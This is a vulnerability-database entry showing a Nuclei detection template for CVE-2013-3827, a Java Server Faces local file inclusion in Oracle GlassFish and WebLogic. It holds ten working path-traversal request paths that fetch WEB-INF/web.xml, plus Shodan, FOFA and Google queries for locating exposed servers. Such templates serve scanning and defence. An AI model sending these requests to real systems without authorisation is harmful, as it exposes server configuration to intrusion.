Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2013-3827
HistoryJun 30, 2021 - 10:50 a.m.

Javafaces LFI

2021-06-3010:50:41
ProjectDiscovery
github.com
103

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

5.3 Medium

AI Score

Confidence

Low

0.175 Low

EPSS

Percentile

96.2%

An Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Fusion Middleware 2.1.1, 3.0.1, and 3.1.2; the Oracle JDeveloper component in Oracle Fusion Middleware 11.1.2.3.0, 11.1.2.4.0, and 12.1.2.0.0; and the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0 and 12.1.1 allows remote attackers to affect confidentiality via unknown vectors related to Java Server Faces or Web Container.

id: CVE-2013-3827

info:
  name: Javafaces LFI
  author: Random-Robbie
  severity: medium
  description: An Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Fusion Middleware 2.1.1, 3.0.1, and 3.1.2; the Oracle JDeveloper component in Oracle Fusion Middleware 11.1.2.3.0, 11.1.2.4.0, and 12.1.2.0.0; and the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0 and 12.1.1 allows remote attackers to affect confidentiality via unknown vectors related to Java Server Faces or Web Container.
  remediation: |
    Apply the latest patches and updates for the affected software to fix the LFI vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2013-3827
    - https://www.exploit-db.com/exploits/38802
    - https://www.oracle.com/security-alerts/cpuoct2013.html
    - http://www.oracle.com/technetwork/topics/security/cpuoct2013-1899837.html
    - http://rhn.redhat.com/errata/RHSA-2014-0029.html
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
    cvss-score: 5
    cve-id: CVE-2013-3827
    cwe-id: NVD-CWE-noinfo
    epss-score: 0.64598
    epss-percentile: 0.97602
    cpe: cpe:2.3:a:oracle:fusion_middleware:2.1.1:*:*:*:*:*:*:*
  metadata:
    max-request: 10
    vendor: oracle
    product: fusion_middleware
    shodan-query:
      - http.title:"weblogic"
      - http.html:"weblogic application server"
    fofa-query:
      - title="weblogic"
      - body="weblogic application server"
    google-query: intitle:"weblogic"
  tags: cve,cve2013,edb,lfi,javafaces,oracle

http:
  - method: GET
    path:
      - "{{BaseURL}}{{paths}}"

    payloads:
      paths:
        - "/costModule/faces/javax.faces.resource/web.xml?loc=../WEB-INF"
        - "/costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
        - "/faces/javax.faces.resource/web.xml?loc=../WEB-INF"
        - "/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
        - "/secureader/javax.faces.resource/web.xml?loc=../WEB-INF"
        - "/secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
        - "/myaccount/javax.faces.resource/web.xml?loc=../WEB-INF"
        - "/myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
        - "/SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF"
        - "/SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<web-app"
          - "</web-app>"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100a5aaa0cf657fb07a07b2e7f3dbfb89dfcfd5ecbec95eebcc67d0a16b7027742b02205cda39d97b2037ad46ec76430102bb2e98c99138c3a92af1bca614d667d8489c:922c64590222798bb761d5b6d8e72950

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

5.3 Medium

AI Score

Confidence

Low

0.175 Low

EPSS

Percentile

96.2%